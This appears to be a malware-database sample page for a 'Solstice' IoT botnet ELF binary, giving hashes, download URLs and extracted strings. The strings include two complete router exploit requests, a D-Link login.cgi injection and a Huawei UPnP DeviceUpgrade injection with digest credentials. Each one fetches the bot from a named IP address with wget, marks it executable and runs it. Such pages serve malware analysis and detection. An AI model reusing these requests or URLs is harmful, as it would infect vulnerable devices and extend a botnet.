Warning! We are currently in recovery mode. The complete archive is not available.

Sample details: 312d24898198d3c47220affb294f3089 --

Hashes
MD5: 312d24898198d3c47220affb294f3089
SHA1: 975c81333537f190778983c63da3aba99754c2fb
SHA256: caad3f0fa6d9b406a7f8bb564414dd33ac5fa10bbc479dfbedfe4ebaf2b1c59a
SSDEEP: 1536:2MzTTdmQI30s3DL9sw8xmF5qK9/vlJhw8DH9KV9QrHtmYT+/CB0PnzZi0:2MzTTdm+IRAMNmYTqCB0v
Details
File Type: ELF
Yara Hits
Source
http://185.101.105.163:80/bins/Solstice.arm5
http://185.101.105.163/bins/Solstice.arm5
http://185.101.105.162/bins/Solstice.arm5
http://185.101.105.162:80/bins/Solstice.arm5
Strings
		/lib/ld-uClibc.so.0
libc.so.0
strcpy
sysconf
connect
sigemptyset
memmove
getpid
memcpy
readlink
malloc
__udivsi3
recvfrom
socket
select
readdir
sigaddset
accept
calloc
__umodsi3
inet_addr
setsockopt
signal
unlink
sendto
realloc
strtok
listen
__aeabi_ldiv0
__uClibc_main
strdup
memset
__div0
__aeabi_uidiv
getppid
opendir
getsockopt
__aeabi_uidivmod
__errno_location
__modsi3
__aeabi_idiv0
strlen
__data_start
setsid
closedir
sigprocmask
getsockname
_edata
__bss_start
__bss_start__
__bss_end__
__end__
POST /cdn-cgi/
Cookie: 
GET /login.cgi?cli=aa%20aa%27;wget%20http://185.101.105.163/bins/Solstice.mips%20-O%20->%20/tmp/.Solstice;chmod%20777%20/tmp/.Solstice;/tmp/.Solstice%20dlink.mips%27$ HTTP/1.1
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Solstice/2.0
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.101.105.163 -l /tmp/rex -r /bins/Solstice.mips; /bin/busybox chmod 777 * /tmp/rex; /tmp/rex huawei.mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
/proc/net/tcp
Solstice.com
abcdefghijklmnopqrstuvw012345678
FGNGVGF
CLKOG"
QVCVWQ"
FTPjGNRGP"
lKeeGp
qMPCnmcfgp"
lKeeGpF
kW{EWHGkSL"
PMWVG"
ARWKLDM"
`memokrq"
NMACN"
UCVAJFME"
UCVAJFME"
}UCVAJFME"
LGVQNKLI
rpktoqe"
egvnmacnkr"
iknncvvi"
eJMQVuWXjGPG
=&vptt
$+16)4
tuut&-,+
twvqps
6055*71
! #$0)1
!$ (*+
pahjape`imj
nqjmtav567
iemjpemjav
fgtf/wavmeh'
-0+1prp|
twvqtwvq
$40$7,*
&-$+" ( 
twvtwv
wsut-=
1u1$)&u+17u)qdE
71pvpu
"PQV[WZW[
%/ZSZP
assword
.shstrtab
.interp
.dynsym
.dynstr
.rel.plt
.rodata
.ctors
.dtors
.dynamic